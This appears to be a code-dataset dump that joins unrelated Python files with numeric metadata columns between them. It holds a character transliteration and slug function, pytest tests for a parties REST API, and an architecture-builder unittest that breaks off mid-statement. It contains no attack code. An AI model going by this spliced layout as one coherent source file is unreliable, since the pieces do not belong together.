ord(u'ù'): u'u',
ord(u'ú'): u'u',
ord(u'û'): u'u',
ord(u'ü'): u'u',
ord(u'ű'): u'u',
ord(u'ý'): u'y',
ord(u'þ'): u'th',
ord(u'ÿ'): u'y',
ord(u'©'): u'c',
# Greek:
ord(u'α'): u'a',
ord(u'β'): u'b',
ord(u'γ'): u'g',
ord(u'δ'): u'd',
ord(u'ε'): u'e',
ord(u'ζ'): u'z',
ord(u'η'): u'h',
ord(u'θ'): u'8',
ord(u'ι'): u'i',
ord(u'κ'): u'k',
ord(u'λ'): u'l',
ord(u'μ'): u'm',
ord(u'ν'): u'n',
ord(u'ξ'): u'3',
ord(u'ο'): u'o',
ord(u'π'): u'p',
ord(u'ρ'): u'r',
ord(u'σ'): u's',
ord(u'τ'): u't',
ord(u'υ'): u'y',
ord(u'φ'): u'f',
ord(u'χ'): u'x',
ord(u'ψ'): u'ps',
ord(u'ω'): u'w',
ord(u'ά'): u'a',
ord(u'έ'): u'e',
ord(u'ί'): u'i',
ord(u'ό'): u'o',
ord(u'ύ'): u'y',
ord(u'ή'): u'h',
ord(u'ώ'): u'w',
ord(u'ς'): u's',
ord(u'ϊ'): u'i',
ord(u'ΰ'): u'y',
ord(u'ϋ'): u'y',
ord(u'ΐ'): u'i',
ord(u'Α'): u'A',
ord(u'Β'): u'B',
ord(u'Γ'): u'G',
ord(u'Δ'): u'D',
ord(u'Ε'): u'E',
ord(u'Ζ'): u'Z',
ord(u'Η'): u'H',
ord(u'Θ'): u'8',
ord(u'Ι'): u'I',
ord(u'Κ'): u'K',
ord(u'Λ'): u'L',
ord(u'Μ'): u'M',
ord(u'Ν'): u'N',
ord(u'Ξ'): u'3',
ord(u'Ο'): u'O',
ord(u'Π'): u'P',
ord(u'Ρ'): u'R',
ord(u'Σ'): u'S',
ord(u'Τ'): u'T',
ord(u'Υ'): u'Y',
ord(u'Φ'): u'F',
ord(u'Χ'): u'X',
ord(u'Ψ'): u'PS',
ord(u'Ω'): u'W',
ord(u'Ά'): u'A',
ord(u'Έ'): u'E',
ord(u'Ί'): u'I',
ord(u'Ό'): u'O',
ord(u'Ύ'): u'Y',
ord(u'Ή'): u'H',
ord(u'Ώ'): u'W',
ord(u'Ϊ'): u'I',
ord(u'Ϋ'): u'Y',
# Turkish:
ord(u'ş'): u's',
ord(u'Ş'): u'S',
ord(u'ı'): u'i',
ord(u'İ'): u'I',
ord(u'ç'): u'c',
ord(u'Ç'): u'C',
ord(u'ü'): u'u',
ord(u'Ü'): u'U',
ord(u'ö'): u'o',
ord(u'Ö'): u'O',
ord(u'ğ'): u'g',
ord(u'Ğ'): u'G',
# Russian:
ord(u'а'): u'a',
ord(u'б'): u'b',
ord(u'в'): u'v',
ord(u'г'): u'g',
ord(u'д'): u'd',
ord(u'е'): u'e',
ord(u'ё'): u'yo',
ord(u'ж'): u'zh',
ord(u'з'): u'z',
ord(u'и'): u'i',
ord(u'й'): u'j',
ord(u'к'): u'k',
ord(u'л'): u'l',
ord(u'м'): u'm',
ord(u'н'): u'n',
ord(u'о'): u'o',
ord(u'п'): u'p',
ord(u'р'): u'r',
ord(u'с'): u's',
ord(u'т'): u't',
ord(u'у'): u'u',
ord(u'ф'): u'f',
ord(u'х'): u'h',
ord(u'ц'): u'c',
ord(u'ч'): u'ch',
ord(u'ш'): u'sh',
ord(u'щ'): u'sch',
ord(u'ъ'): u'',
ord(u'ы'): u'y',
ord(u'ь'): u'',
ord(u'э'): u'e',
ord(u'ю'): u'yu',
ord(u'я'): u'ya',
ord(u'А'): u'A',
ord(u'Б'): u'B',
ord(u'В'): u'V',
ord(u'Г'): u'G',
ord(u'Д'): u'D',
ord(u'Е'): u'E',
ord(u'Ё'): u'Yo',
ord(u'Ж'): u'Zh',
ord(u'З'): u'Z',
ord(u'И'): u'I',
ord(u'Й'): u'J',
ord(u'К'): u'K',
ord(u'Л'): u'L',
ord(u'М'): u'M',
ord(u'Н'): u'N',
ord(u'О'): u'O',
ord(u'П'): u'P',
ord(u'Р'): u'R',
ord(u'С'): u'S',
ord(u'Т'): u'T',
ord(u'У'): u'U',
ord(u'Ф'): u'F',
ord(u'Х'): u'H',
ord(u'Ц'): u'C',
ord(u'Ч'): u'Ch',
ord(u'Ш'): u'Sh',
ord(u'Щ'): u'Sch',
ord(u'Ъ'): u'',
ord(u'Ы'): u'Y',
ord(u'Ь'): u'',
ord(u'Э'): u'E',
ord(u'Ю'): u'Yu',
ord(u'Я'): u'Ya',
# Ukrainian:
ord(u'Є'): u'Ye',
ord(u'І'): u'I',
ord(u'Ї'): u'Yi',
ord(u'Ґ'): u'G',
ord(u'є'): u'ye',
ord(u'і'): u'i',
ord(u'ї'): u'yi',
ord(u'ґ'): u'g',
# Czech:
ord(u'č'): u'c',
ord(u'ď'): u'd',
ord(u'ě'): u'e',
ord(u'ň'): u'n',
ord(u'ř'): u'r',
ord(u'š'): u's',
ord(u'ť'): u't',
ord(u'ů'): u'u',
ord(u'ž'): u'z',
ord(u'Č'): u'C',
ord(u'Ď'): u'D',
ord(u'Ě'): u'E',
ord(u'Ň'): u'N',
ord(u'Ř'): u'R',
ord(u'Š'): u'S',
ord(u'Ť'): u'T',
ord(u'Ů'): u'U',
ord(u'Ž'): u'Z',
# Polish:
ord(u'ą'): u'a',
ord(u'ć'): u'c',
ord(u'ę'): u'e',
ord(u'ł'): u'l',
ord(u'ń'): u'n',
ord(u'ó'): u'o',
ord(u'ś'): u's',
ord(u'ź'): u'z',
ord(u'ż'): u'z',
ord(u'Ą'): u'A',
ord(u'Ć'): u'C',
ord(u'Ę'): u'e',
ord(u'Ł'): u'L',
ord(u'Ń'): u'N',
ord(u'Ó'): u'o',
ord(u'Ś'): u'S',
ord(u'Ź'): u'Z',
ord(u'Ż'): u'Z',
# Latvian:
ord(u'ā'): u'a',
ord(u'č'): u'c',
ord(u'ē'): u'e',
ord(u'ģ'): u'g',
ord(u'ī'): u'i',
ord(u'ķ'): u'k',
ord(u'ļ'): u'l',
ord(u'ņ'): u'n',
ord(u'š'): u's',
ord(u'ū'): u'u',
ord(u'ž'): u'z',
ord(u'Ā'): u'A',
ord(u'Č'): u'C',
ord(u'Ē'): u'E',
ord(u'Ģ'): u'G',
ord(u'Ī'): u'i',
ord(u'Ķ'): u'k',
ord(u'Ļ'): u'L',
ord(u'Ņ'): u'N',
ord(u'Š'): u'S',
ord(u'Ū'): u'u',
ord(u'Ž'): u'Z',
}
EXCLUSIONS = [
'a',
'an',
'as',
'at',
'before',
'but',
'by',
'for',
'from',
'is',
'in',
'into',
'like',
'of',
'off',
'on',
'onto',
'per',
'since',
'than',
'the',
'this',
'that',
'up',
'via',
'with',
]
_base = re.compile(r"[a-zA-Z\d\s-]+")
_space = re.compile(r"[\s_\-]+")
def urlify(text, exclude=EXCLUSIONS, ext_map={}):
UBERMAP.update(ext_map)
mapchar = lambda c: c if _base.match(c) else UBERMAP.get(ord(c), '')
result = ''.join(map(mapchar, text)).lower()
exclude = re.compile('|'.join([r"\b%s\b" % word for word in exclude]))
return _space.sub('-', exclude.sub('', result)).strip('-')
| 19.85755
| 74
| 0.366284
| 1,527
| 6,970
| 1.648985
| 0.169614
| 0.444797
| 0.047657
| 0.057188
| 0.772836
| 0.764893
| 0.764893
| 0.742653
| 0.742653
| 0.732327
| 0
| 0.00159
| 0.278192
| 6,970
| 350
| 75
| 19.914286
| 0.498509
| 0.011478
| 0
| 0.08
| 0
| 0
| 0.110901
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003077
| false
| 0
| 0.003077
| 0
| 0.009231
| 0
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3b3d10638bea4ba43e0e4c4b9d426c928202e307
| 8,007
|
py
|
Python
|
services/core-api/tests/parties/party/resources/test_party_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | null | null | null |
services/core-api/tests/parties/party/resources/test_party_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | null | null | null |
services/core-api/tests/parties/party/resources/test_party_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | 1
|
2020-01-22T14:19:16.000Z
|
2020-01-22T14:19:16.000Z
|
import json, uuid
from tests.factories import PartyFactory
from app.api.utils.custom_reqparser import DEFAULT_MISSING_REQUIRED
# GET
def test_get_person_not_found(test_client, db_session, auth_headers):
get_resp = test_client.get(f'/parties/{uuid.uuid4()}', headers=auth_headers['full_auth_header'])
get_data = json.loads(get_resp.data.decode())
assert get_resp.status_code == 404
assert 'not found' in get_data['message']
def test_get_person(test_client, db_session, auth_headers):
party_guid = PartyFactory(person=True).party_guid
get_resp = test_client.get(f'/parties/{party_guid}', headers=auth_headers['full_auth_header'])
get_data = json.loads(get_resp.data.decode())
assert get_resp.status_code == 200
assert get_data['party_guid'] == str(party_guid)
# POST
def test_post_person_no_first_name(test_client, db_session, auth_headers):
test_person_data = {
"party_name": "Last",
"party_type_code": "PER",
"phone_no": "123-456-7890",
"email": "this@test.com"
}
post_resp = test_client.post(
'/parties', data=test_person_data, headers=auth_headers['full_auth_header'])
post_data = json.loads(post_resp.data.decode())
assert post_resp.status_code == 400
assert 'first name' in post_data['message'].lower()
def test_post_person_no_required_party_name(test_client, db_session, auth_headers):
test_person_data = {
"first_name": "First",
"party_type_codetype": "PER",
"phone_no": "123-456-7890",
"email": "this@test.com"
}
post_resp = test_client.post(
'/parties', data=test_person_data, headers=auth_headers['full_auth_header'])
post_data = json.loads(post_resp.data.decode())
assert post_resp.status_code == 400
assert DEFAULT_MISSING_REQUIRED in post_data['message']
def test_post_person_no_required_phone_no(test_client, db_session, auth_headers):
test_person_data = {
"first_name": "First",
"party_name": "Last",
"party_type_codetype": "PER",
"email": "this@test.com"
}
post_resp = test_client.post(
'/parties', data=test_person_data, headers=auth_headers['full_auth_header'])
post_data = json.loads(post_resp.data.decode())
assert post_resp.status_code == 400
assert DEFAULT_MISSING_REQUIRED in post_data['message']
def test_post_person_success(test_client, db_session, auth_headers):
test_person_data = {
"party_name": "Last",
"email": "this@test.com",
"phone_no": "123-456-7890",
"party_type_code": "PER",
"first_name": "First",
"suite_no": "1234",
"address_line_1": "1234 Foo Street",
"address_line_2": "1234 Bar Blvd",
"city": "Baz Town",
"sub_division_code": "BC",
"post_code": "X0X0X0",
"address_type_code": "CAN"
}
post_resp = test_client.post(
'/parties', data=test_person_data, headers=auth_headers['full_auth_header'])
post_data = json.loads(post_resp.data.decode())
assert post_resp.status_code == 200, post_resp.response
assert post_data['party_name'] == test_person_data['party_name']
assert post_data['email'] == test_person_data['email']
assert post_data['phone_no'] == test_person_data['phone_no']
assert post_data['party_type_code'] == test_person_data['party_type_code']
assert post_data['first_name'] == test_person_data['first_name']
address = post_data['address'][0]
assert address['suite_no'] == test_person_data['suite_no']
assert address['address_line_1'] == test_person_data['address_line_1']
assert address['address_line_2'] == test_person_data['address_line_2']
assert address['city'] == test_person_data['city']
assert address['sub_division_code'] == test_person_data['sub_division_code']
assert address['post_code'] == test_person_data['post_code']
assert address['address_type_code'] == test_person_data['address_type_code']
def test_post_company_success(test_client, db_session, auth_headers):
test_person_data = {
"party_name": "Last",
"email": "this@test.com",
"phone_no": "123-456-7890",
"party_type_code": "ORG",
"suite_no": "1234",
"address_line_1": "1234 Foo Street",
"address_line_2": "1234 Bar Blvd",
"city": "Baz Town",
"sub_division_code": "BC",
"post_code": "X0X0X0",
"address_type_code": "CAN"
}
post_resp = test_client.post(
'/parties', data=test_person_data, headers=auth_headers['full_auth_header'])
post_data = json.loads(post_resp.data.decode())
assert post_resp.status_code == 200
assert post_data['party_name'] == test_person_data['party_name']
assert post_data['email'] == test_person_data['email']
assert post_data['phone_no'] == test_person_data['phone_no']
assert post_data['party_type_code'] == test_person_data['party_type_code']
address = post_data['address'][0]
assert address['suite_no'] == test_person_data['suite_no']
assert address['address_line_1'] == test_person_data['address_line_1']
assert address['address_line_2'] == test_person_data['address_line_2']
assert address['city'] == test_person_data['city']
assert address['sub_division_code'] == test_person_data['sub_division_code']
assert address['post_code'] == test_person_data['post_code']
assert address['address_type_code'] == test_person_data['address_type_code']
# PUT
def test_put_person_not_found(test_client, db_session, auth_headers):
test_person_data = {"first_name": 'First', "party_name": 'Last'}
put_resp = test_client.put(
f'/parties/{uuid.uuid4()}', data=test_person_data, headers=auth_headers['full_auth_header'])
put_data = json.loads(put_resp.data.decode())
assert put_resp.status_code == 404
assert 'not found' in put_data['message']
def test_put_person_success(test_client, db_session, auth_headers):
party_guid = PartyFactory(person=True).party_guid
test_person_data = {
"party_name": "Changedlast",
"email": "new_email_12345@testuser.com",
"phone_no": "682-732-8490",
"party_type_code": "PER",
"first_name": "Changedfirst",
"suite_no": "1234",
"address_line_1": "1234 Foo Street",
"address_line_2": "1234 Bar Blvd",
"city": "Baz Town",
"sub_division_code": "BC",
"post_code": "X0X0X0",
"address_type_code": "CAN"
}
put_resp = test_client.put(
f'/parties/{party_guid}', data=test_person_data, headers=auth_headers['full_auth_header'])
put_data = json.loads(put_resp.data.decode())
assert put_resp.status_code == 200
assert put_data['party_name'] == test_person_data['party_name']
assert put_data['email'] == test_person_data['email']
assert put_data['phone_no'] == test_person_data['phone_no']
assert put_data['party_type_code'] == test_person_data['party_type_code']
assert put_data['first_name'] == test_person_data['first_name']
address = put_data['address'][0]
assert address['suite_no'] == test_person_data['suite_no']
assert address['address_line_1'] == test_person_data['address_line_1']
assert address['address_line_2'] == test_person_data['address_line_2']
assert address['city'] == test_person_data['city']
assert address['sub_division_code'] == test_person_data['sub_division_code']
assert address['post_code'] == test_person_data['post_code']
assert address['address_type_code'] == test_person_data['address_type_code']
# DELETE
def test_delete_person_as_admin(test_client, db_session, auth_headers):
party_guid = PartyFactory(person=True).party_guid
delete_resp = test_client.delete(
f'/parties/{party_guid}', headers=auth_headers['full_auth_header'])
assert delete_resp.status_code == 204
get_resp = test_client.get(f'/parties/{party_guid}', headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 404
| 41.921466
| 100
| 0.694642
| 1,106
| 8,007
| 4.618445
| 0.089512
| 0.095928
| 0.134299
| 0.042287
| 0.895067
| 0.879796
| 0.861394
| 0.838293
| 0.828309
| 0.785826
| 0
| 0.023416
| 0.167978
| 8,007
| 190
| 101
| 42.142105
| 0.74332
| 0.002373
| 0
| 0.704403
| 0
| 0
| 0.265564
| 0.019792
| 0
| 0
| 0
| 0
| 0.327044
| 1
| 0.062893
| false
| 0
| 0.018868
| 0
| 0.081761
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b8b48fea96fa0fb4c9124889bd993c1a071deea
| 93,415
|
py
|
Python
|
sos_trades_core/tests/l0_test_54_advanced_archi_builder.py
|
os-climate/sostrades-core
|
bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9
|
[
"Apache-2.0"
] | 8
|
2022-01-10T14:44:28.000Z
|
2022-03-31T08:57:14.000Z
|
sos_trades_core/tests/l0_test_54_advanced_archi_builder.py
|
os-climate/sostrades-core
|
bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9
|
[
"Apache-2.0"
] | null | null | null |
sos_trades_core/tests/l0_test_54_advanced_archi_builder.py
|
os-climate/sostrades-core
|
bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9
|
[
"Apache-2.0"
] | 1
|
2022-02-21T14:51:45.000Z
|
2022-02-21T14:51:45.000Z
|
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
'''
import unittest
from tempfile import gettempdir
import pandas as pd
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.execution_engine.sos_discipline_scatter import SoSDisciplineScatter
from sos_trades_core.sos_wrapping.valueblock_discipline import ValueBlockDiscipline
class TestAdvancedArchiBuilder(unittest.TestCase):
"""
Class to test multi level process built from architecture builder, scatter of architecture and cleaning
"""
def setUp(self):
'''
Initialize third data needed for testing
'''
self.dirs_to_del = []
self.namespace = 'MyCase'
self.study_name = f'{self.namespace}'
self.exec_eng = ExecutionEngine(self.namespace)
self.factory = self.exec_eng.factory
self.root_dir = gettempdir()
def test_01_build_sub_architecture(self):
vb_builder_name = 'Business'
sub_architecture_df = pd.DataFrame(
{'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('standard'), ('standard')],
'Activation': [False, False, False, False], })
architecture_df = pd.DataFrame(
{'Parent': ['Business', 'Business', 'Airbus', 'Boeing'],
'Current': ['Airbus', 'Boeing', 'Services', 'AC_Sales'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('architecture', sub_architecture_df), ('standard')],
'Activation': [True, True, False, False], })
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
self.exec_eng.factory.set_builders_to_coupling_builder(
builder)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_market_in': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.configure()
self.exec_eng.load_study_from_input_dict({})
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ Airbus',
'\t\t\t|_ Services',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ FHS',
'\t\t\t\t|_ Maintenance',
'\t\t\t\t\t|_ OSS',
'\t\t|_ Boeing',
'\t\t\t|_ AC_Sales', ]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_02_build_two_sub_architectures(self):
vb_builder_name = 'Business'
sub_architecture_df = pd.DataFrame(
{'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('standard'), ('standard')],
'Activation': [False, False, False, False], })
sub_architecture_component_df = pd.DataFrame(
{'Parent': ['AC_Sales', 'AC_Sales', 'Airframe', 'Airframe'],
'Current': ['Propulsion', 'Airframe', 'Wing', 'VTP'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('standard'), ('standard')],
'Activation': [False, False, False, False], })
architecture_df = pd.DataFrame(
{'Parent': ['Business', 'Business', 'Airbus', 'Boeing', 'Airbus'],
'Current': ['Airbus', 'Boeing', 'Services', 'AC_Sales', 'AC_Sales'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline', 'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('architecture', sub_architecture_df),
('architecture', sub_architecture_component_df),
('architecture', sub_architecture_component_df)],
'Activation': [True, True, False, False, False], })
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
self.exec_eng.factory.set_builders_to_coupling_builder(
builder)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_market_in': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.configure()
self.exec_eng.load_study_from_input_dict({})
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ Airbus',
'\t\t\t|_ Services',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ FHS',
'\t\t\t\t|_ Maintenance',
'\t\t\t\t\t|_ OSS',
'\t\t\t|_ AC_Sales',
'\t\t\t\t|_ Propulsion',
'\t\t\t\t|_ Airframe',
'\t\t\t\t\t|_ Wing',
'\t\t\t\t\t|_ VTP',
'\t\t|_ Boeing',
'\t\t\t|_ AC_Sales',
'\t\t\t\t|_ Propulsion',
'\t\t\t\t|_ Airframe',
'\t\t\t\t\t|_ Wing',
'\t\t\t\t\t|_ VTP', ]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_03_build_sub_sub_architecture(self):
vb_builder_name = 'Business'
sub_sub_architecture_df = pd.DataFrame(
{'Parent': ['OSS', 'OSS', 'OSS level 1', 'OSS level 1'],
'Current': ['OSS level 1', 'OSS level 2', 'OSS level 11', 'OSS level 12'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('standard'), ('standard')],
'Activation': [False, False, False, False], })
sub_architecture_df = pd.DataFrame(
{'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('standard'), ('architecture', sub_sub_architecture_df)],
'Activation': [False, False, False, False], })
architecture_df = pd.DataFrame(
{'Parent': ['Business', 'Business', 'Airbus', 'Boeing'],
'Current': ['Airbus', 'Boeing', 'Services', 'AC_Sales'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('architecture', sub_architecture_df), ('standard')],
'Activation': [True, True, False, False], })
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
self.exec_eng.factory.set_builders_to_coupling_builder(
builder)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_market_in': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.configure()
self.exec_eng.load_study_from_input_dict({})
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ Airbus',
'\t\t\t|_ Services',
'\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t|_ FHS',
'\t\t\t\t|_ Maintenance',
'\t\t\t\t\t|_ OSS',
'\t\t\t\t\t\t|_ OSS level 1',
'\t\t\t\t\t\t\t|_ OSS level 11',
'\t\t\t\t\t\t\t|_ OSS level 12',
'\t\t\t\t\t\t|_ OSS level 2',
'\t\t|_ Boeing',
'\t\t\t|_ AC_Sales', ]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_04_build_scatter_architecture(self):
vb_builder_name = 'Business'
mydict = {'input_name': 'AC_list',
'input_type': 'string_list',
'input_ns': 'ns_public',
'output_name': 'AC_name',
'scatter_ns': 'ns_ac'}
self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
sub_architecture_df = pd.DataFrame(
{'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('standard'), ('standard')],
'Activation': [False, False, False, False], })
architecture_df = pd.DataFrame(
{'Parent': ['Business', 'Business', 'Airbus', 'Boeing'],
'Current': ['Airbus', 'Boeing', 'Services', 'AC_Sales'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'),
('scatter_architecture', 'AC_list',
'SumValueBlockDiscipline', sub_architecture_df),
('standard')],
'Activation': [True, True, False, False], })
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
self.exec_eng.factory.set_builders_to_coupling_builder(
builder)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_market_in': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.configure()
activation_df = pd.DataFrame(
{'Business': ['Airbus', 'Airbus', 'Airbus'],
'AC_list': ['AC1', 'AC2', 'AC3'],
'Services': [True, True, True]})
self.exec_eng.load_study_from_input_dict(
{'MyCase.Business.activation_df': activation_df})
exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ {vb_builder_name}',
'\t\t|_ Airbus',
'\t\t\t|_ Services',
'\t\t\t\t|_ AC1',
'\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ AC2',
'\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ AC3',
'\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t|_ OSS',
'\t\t|_ Boeing',
'\t\t\t|_ AC_Sales',
]
exp_tv_str = '\n'.join(exp_tv_list)
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
self.assertEqual(self.exec_eng.dm.get_disciplines_with_name('MyCase.Business.Airbus.Services')[
1].scatter_builders.cls.__name__, 'SumValueBlockDiscipline')
self.assertEqual(self.exec_eng.dm.get_disciplines_with_name(
'MyCase.Business.Airbus.Services.AC1')[0].__class__.__name__, 'SumValueBlockDiscipline')
self.assertEqual(self.exec_eng.dm.get_disciplines_with_name(
'MyCase.Business.Airbus.Services.AC2')[0].__class__.__name__, 'SumValueBlockDiscipline')
self.assertEqual(self.exec_eng.dm.get_disciplines_with_name(
'MyCase.Business.Airbus.Services.AC3')[0].__class__.__name__, 'SumValueBlockDiscipline')
def test_05_build_scatter_of_scatter(self):
mydict = {'input_name': 'AC_list',
'input_type': 'string_list',
'input_ns': 'ns_public',
'output_name': 'AC_name',
'scatter_ns': 'ns_ac'}
self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
mydict = {'input_name': 'component_list',
'input_type': 'string_list',
'input_ns': 'ns_public',
'output_name': 'component_name',
'scatter_ns': 'ns_ac'}
self.exec_eng.smaps_manager.add_build_map('component_list', mydict)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
vb_builder_name = 'Business'
architecture_df = pd.DataFrame(
